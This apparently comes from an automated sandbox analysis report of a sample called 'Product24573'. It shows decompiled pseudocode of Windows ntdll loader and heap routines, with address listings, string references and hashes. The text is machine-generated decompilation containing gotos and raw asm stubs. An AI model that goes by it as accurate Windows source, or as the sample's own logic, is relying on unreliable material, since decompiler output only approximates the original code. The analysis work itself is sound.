											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01108999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x11e5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x11e5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01112280(_t92, 0x11e86cc);
															_t94 = E011C9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E011261A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x11e5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01108A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x11e5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x11e5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0113F380(_t136, 0x10d1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01112280(_t108, 0x11e86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E011261A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E011C9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0110FFB0(_t118, _t156, 0x11e86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01139A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                          0x01108799
                                          0x0110879d
                                          0x011087a1
                                          0x011087a3
                                          0x011087a8
                                          0x011087c3
                                          0x011087c3
                                          0x011087c8
                                          0x011087d1
                                          0x011087d4
                                          0x011087d8
                                          0x011087e5
                                          0x011087ec
                                          0x01159bfe
                                          0x01159c00
                                          0x01159c02
                                          0x01159c08
                                          0x01159c0d
                                          0x01159c0f
                                          0x01159c14
                                          0x01159c2d
                                          0x01159c32
                                          0x01159c37
                                          0x01159c3a
                                          0x01159c3c
                                          0x01159c42
                                          0x01159c42
                                          0x01159c3c
                                          0x01159c02
                                          0x011087da
                                          0x011087df
                                          0x011087e3
                                          0x00000000
                                          0x00000000
                                          0x011087e3
                                          0x011087f2
                                          0x00000000
                                          0x011087fb
                                          0x011087fd
                                          0x011087fe
                                          0x0110880e
                                          0x0110880f
                                          0x01108810
                                          0x01108814
                                          0x0110881a
                                          0x0110881c
                                          0x0110881f
                                          0x01108821
                                          0x01108822
                                          0x01108824
                                          0x01108826
                                          0x0110882c
                                          0x0110882e
                                          0x01159c48
                                          0x01159c48
                                          0x01108834
                                          0x01108834
                                          0x01108837
                                          0x00000000
                                          0x00000000
                                          0x01108837
                                          0x0110882e
                                          0x0110883d
                                          0x01108840
                                          0x01108843
                                          0x01108846
                                          0x01108849
                                          0x0110884c
                                          0x0110884e
                                          0x01108850
                                          0x01108852
                                          0x01108854
                                          0x01108857
                                          0x011088b4
                                          0x011088b6
                                          0x011088b6
                                          0x01108859
                                          0x01108859
                                          0x01108859
                                          0x01108861
                                          0x01108866
                                          0x0110886a
                                          0x0110893d
                                          0x01108941
                                          0x00000000
                                          0x01108947
                                          0x01108947
                                          0x0110894a
                                          0x0110894c
                                          0x00000000
                                          0x01108952
                                          0x01108955
                                          0x0110895a
                                          0x0110895d
                                          0x0110895d
                                          0x0110895f
                                          0x01108961
                                          0x01108961
                                          0x01108968
                                          0x00000000
                                          0x00000000
                                          0x0110896a
                                          0x0110896b
                                          0x0110896e
                                          0x00000000
                                          0x01108970
                                          0x01108970
                                          0x01108970
                                          0x01108970
                                          0x01108972
                                          0x01108972
                                          0x01108974
                                          0x00000000
                                          0x0110897a
                                          0x0110897a
                                          0x0110897d
                                          0x00000000
                                          0x01108983
                                          0x01159c65
                                          0x01159c6d
                                          0x01159c72
                                          0x01159c75
                                          0x01159c75
                                          0x01159c82
                                          0x01159c86
                                          0x01159c87
                                          0x01159c88
                                          0x01159c89
                                          0x01159c8c
                                          0x01159c90
                                          0x01159c95
                                          0x01159c97
                                          0x01159ca0
                                          0x01159ca3
                                          0x01159ca9
                                          0x01159ca9
                                          0x00000000
                                          0x01159ca9
                                          0x01159ca3
                                          0x00000000
                                          0x01159c97
                                          0x0110897d
                                          0x00000000
                                          0x01108974
                                          0x01108988
                                          0x01108992
                                          0x01108996
                                          0x00000000
                                          0x01108996
                                          0x0110894c
                                          0x00000000
                                          0x01108870
                                          0x0110887b
                                          0x0110887d
                                          0x0110887f
                                          0x01108881
                                          0x01108884
                                          0x01108884
                                          0x01108886
                                          0x01108889
                                          0x0110888c
                                          0x0110888e
                                          0x01108891
                                          0x01108891
                                          0x01108898
                                          0x00000000
                                          0x00000000
                                          0x0110889a
                                          0x0110889b
                                          0x0110889e
                                          0x00000000
                                          0x00000000
                                          0x011088a0
                                          0x011088a8
                                          0x011088b0
                                          0x011088b2
                                          0x011088d3
                                          0x011088d5
                                          0x00000000
                                          0x011088d7
                                          0x011088db
                                          0x011088dc
                                          0x011088e0
                                          0x011088e8
                                          0x011088ee
                                          0x011088f0
                                          0x011088f3
                                          0x011088fc
                                          0x01108901
                                          0x01108906
                                          0x0110890c
                                          0x0110890c
                                          0x0110890f
                                          0x01108916
                                          0x01108917
                                          0x01108918
                                          0x01108919
                                          0x0110891a
                                          0x0110891f
                                          0x01108921
                                          0x01159c52
                                          0x01159c55
                                          0x01159c5b
                                          0x01159cac
                                          0x01159cc0
                                          0x01159cc0
                                          0x01159c55
                                          0x01108927
                                          0x01108927
                                          0x0110892f
                                          0x01108933
                                          0x00000000
                                          0x011088f5
                                          0x011088f5
                                          0x00000000
                                          0x011088f7
                                          0x011088f7
                                          0x011088fa
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011088fa
                                          0x011088f5
                                          0x011088f3
                                          0x00000000
                                          0x011088d5
                                          0x00000000
                                          0x011088b2
                                          0x011088c9
                                          0x00000000
                                          0x011088c9
                                          0x0110887f
                                          0x0110886a
                                          0x01108857
                                          0x01108852
                                          0x011088bf
                                          0x011088bf
                                          0x011087aa
                                          0x011087ad
                                          0x011087ae
                                          0x011087b4
                                          0x011087b5
                                          0x011087b6
                                          0x011087b8
                                          0x011087bd
                                          0x011087c1
                                          0x011087f4
                                          0x011087fa
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011087c1
                                          0x00000000

                                          Strings
                                          • LdrpDoPostSnapWork, xrefs: 01159C1E
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 01159C28
                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01159C18
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 2994545307-1948996284
                                          • Opcode ID: 4e3604cd54eeb3e3160d0db14ceceab0da422a9189303fd91b683231656137f5
                                          • Instruction ID: 0fec9a9bbce3d09a26e945de1f2315661fc6aa09f30003da40566c3713d861be
                                          • Opcode Fuzzy Hash: 4e3604cd54eeb3e3160d0db14ceceab0da422a9189303fd91b683231656137f5
                                          • Instruction Fuzzy Hash: F4915931E0461ADFDF1EDF98C4809BA77B5FF84318B15406AD905AB281E7B0EE01CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0112AC7B Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E0112AC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E0114D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x11e8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E011396E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E011A3C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E011396E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E010FB150();
							} else {
								E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E010FB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E011B14FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E01117D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E011B1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E01117D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E011B1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                          0x0112ac85
                                          0x0112ac88
                                          0x0112ac8a
                                          0x0112ac8d
                                          0x0112ac91
                                          0x0112ac99
                                          0x0112ac9c
                                          0x01169f57
                                          0x01169f5b
                                          0x01169f60
                                          0x01169f60
                                          0x0112aca8
                                          0x0112acae
                                          0x0112acda
                                          0x0112acde
                                          0x0112ace8
                                          0x0112aceb
                                          0x0112acee
                                          0x00000000
                                          0x0112acee
                                          0x0112acf6
                                          0x0112acb0
                                          0x0112acb0
                                          0x0112acbb
                                          0x0112acbd
                                          0x0112acc0
                                          0x0112acc5
                                          0x0112adae
                                          0x0112adb4
                                          0x0112adb4
                                          0x0112acd4
                                          0x0112acd8
                                          0x0112acf9
                                          0x0112acff
                                          0x0112ad04
                                          0x0112ad08
                                          0x0112ad09
                                          0x0112ad10
                                          0x0112ad12
                                          0x0112ad18
                                          0x01169f6f
                                          0x01169f74
                                          0x01169f76
                                          0x01169f7c
                                          0x01169f84
                                          0x01169f88
                                          0x01169f89
                                          0x01169f90
                                          0x01169f90
                                          0x01169f76
                                          0x0112ad1e
                                          0x0112ad24
                                          0x0112ad26
                                          0x0116a097
                                          0x0116a09b
                                          0x0116a0ba
                                          0x0116a0bf
                                          0x0116a09d
                                          0x0116a0b2
                                          0x0116a0b7
                                          0x0116a0c5
                                          0x0116a0c8
                                          0x0116a0cb
                                          0x0116a0d2
                                          0x00000000
                                          0x0112ad2c
                                          0x0112ad2c
                                          0x0112ad2f
                                          0x0112ad34
                                          0x0112ad36
                                          0x01169f97
                                          0x01169f9a
                                          0x00000000
                                          0x00000000
                                          0x01169fa9
                                          0x0112ad3e
                                          0x0112ad3e
                                          0x0112ad41
                                          0x01169fb3
                                          0x01169fb9
                                          0x01169fc0
                                          0x01169fd0
                                          0x01169fd0
                                          0x01169fc0
                                          0x0112ad4a
                                          0x0112ad50
                                          0x0112ad5c
                                          0x0112ad62
                                          0x0112ad68
                                          0x0112ad6b
                                          0x0112ad6d
                                          0x01169fda
                                          0x01169fdd
                                          0x00000000
                                          0x00000000
                                          0x01169fec
                                          0x00000000
                                          0x0112ad73
                                          0x0112ad73
                                          0x0112ad73
                                          0x0112ad75
                                          0x0112ad75
                                          0x0112ad78
                                          0x01169ff6
                                          0x01169ffc
                                          0x0116a003
                                          0x0116a00e
                                          0x0116a010
                                          0x0116a01b
                                          0x0116a01b
                                          0x0116a01b
                                          0x0116a038
                                          0x0116a038
                                          0x0116a003
                                          0x0112ad84
                                          0x0112ad89
                                          0x0112ad8c
                                          0x0112ad8e
                                          0x0116a042
                                          0x0116a045
                                          0x00000000
                                          0x00000000
                                          0x0116a054
                                          0x00000000
                                          0x0112ad94
                                          0x0112ad94
                                          0x0112ad94
                                          0x0112ad96
                                          0x0112ad96
                                          0x0112ad99
                                          0x0116a063
                                          0x0116a065
                                          0x0116a070
                                          0x0116a070
                                          0x0116a070
                                          0x0116a08d
                                          0x0116a08d
                                          0x0112ada4
                                          0x0112ada6
                                          0x00000000
                                          0x0112ada6
                                          0x0112ad8e
                                          0x0112ad6d
                                          0x0112ad3c
                                          0x0112ad3c
                                          0x00000000
                                          0x0112ad3c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0112acd8

                                          Strings
                                          • HEAP: , xrefs: 0116A0BA
                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0116A0CD
                                          • HEAP[%wZ]: , xrefs: 0116A0AD
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                          • API String ID: 0-1340214556
                                          • Opcode ID: db6b702dbd399f2dc9f89e0c62040e844f39178626d486b0019e64b27619cf26
                                          • Instruction ID: 7bb25a6c9109b16ee338f4cfaf989cb7cd1c48c89982501c665ec8681af16b10
                                          • Opcode Fuzzy Hash: db6b702dbd399f2dc9f89e0c62040e844f39178626d486b0019e64b27619cf26
                                          • Instruction Fuzzy Hash: 22812631200A98EFD72ECBACD884BA9BBF8FF04314F0541A5E5518BA92D775E960CB11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0111B73D Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E0111B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E011BA80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x11e8748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E010FB150();
					} else {
						E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E010FB150();
					__eflags =  *0x11e7bc8;
					if(__eflags == 0) {
						E011B2073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E011BA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x11e8720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x11e8720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E0111B8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E011BA80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E0111E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                          0x0111b746
                                          0x0111b74b
                                          0x0111b74d
                                          0x0111b750
                                          0x0111b755
                                          0x0111b758
                                          0x0111b758
                                          0x0111b75e
                                          0x0111b763
                                          0x0111b764
                                          0x0111b76a
                                          0x0111b76d
                                          0x0111b771
                                          0x0111b776
                                          0x0111b85c
                                          0x0111b85d
                                          0x0111b860
                                          0x0111b865
                                          0x01162ba1
                                          0x01162ba2
                                          0x01162ba9
                                          0x01162bae
                                          0x01162bae
                                          0x0111b77c
                                          0x0111b77c
                                          0x0111b77c
                                          0x0111b785
                                          0x0111b788
                                          0x01162bb6
                                          0x01162bb9
                                          0x00000000
                                          0x00000000
                                          0x01162bbf
                                          0x01162bc5
                                          0x01162bc9
                                          0x01162be8
                                          0x01162bed
                                          0x01162bcb
                                          0x01162be0
                                          0x01162be5
                                          0x01162bf3
                                          0x01162bf8
                                          0x01162bfd
                                          0x01162c05
                                          0x01162c0e
                                          0x01162c0e
                                          0x00000000
                                          0x0111b78e
                                          0x0111b78e
                                          0x0111b78e
                                          0x0111b791
                                          0x0111b791
                                          0x0111b797
                                          0x0111b797
                                          0x0111b79f
                                          0x0111b7a9
                                          0x0111b7af
                                          0x0111b7af
                                          0x0111b7b1
                                          0x0111b7b6
                                          0x0111b7e2
                                          0x0111b7e2
                                          0x0111b7e7
                                          0x0111b880
                                          0x0111b7ed
                                          0x0111b7ed
                                          0x0111b7ed
                                          0x0111b7ef
                                          0x0111b7f2
                                          0x0111b7f2
                                          0x0111b7f5
                                          0x0111b7fa
                                          0x01162c2d
                                          0x01162c2e
                                          0x01162c39
                                          0x0111b800
                                          0x0111b800
                                          0x0111b802
                                          0x0111b805
                                          0x0111b808
                                          0x0111b808
                                          0x0111b80a
                                          0x0111b80d
                                          0x0111b816
                                          0x0111b81c
                                          0x0111b822
                                          0x0111b82f
                                          0x0111b88b
                                          0x0111b892
                                          0x0111b897
                                          0x0111b899
                                          0x0111b89b
                                          0x0111b89e
                                          0x0111b8a5
                                          0x0111b8a8
                                          0x0111b8aa
                                          0x0111b8ac
                                          0x0111b8ac
                                          0x0111b8aa
                                          0x0111b892
                                          0x0111b831
                                          0x0111b839
                                          0x0111b83b
                                          0x0111b83b
                                          0x0111b844
                                          0x0111b84b
                                          0x0111b852
                                          0x0111b7b8
                                          0x0111b7ba
                                          0x0111b7bf
                                          0x0111b7c4
                                          0x01162c18
                                          0x01162c19
                                          0x01162c23
                                          0x0111b7ca
                                          0x0111b7ca
                                          0x0111b7cc
                                          0x0111b7cf
                                          0x0111b7d1
                                          0x0111b7d1
                                          0x0111b7d4
                                          0x0111b7dc
                                          0x0111b8bb
                                          0x0111b8bb
                                          0x0111b8be
                                          0x0111b8be
                                          0x0111b8c1
                                          0x00000000
                                          0x00000000
                                          0x0111b8c3
                                          0x0111b8c5
                                          0x0111b8c7
                                          0x0111b8e0
                                          0x00000000
                                          0x0111b8e0
                                          0x0111b8cc
                                          0x0111b8cc
                                          0x00000000
                                          0x0111b8cc
                                          0x0111b8d6
                                          0x0111b8d6
                                          0x00000000
                                          0x0111b7dc
                                          0x0111b7b6

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-1334570610
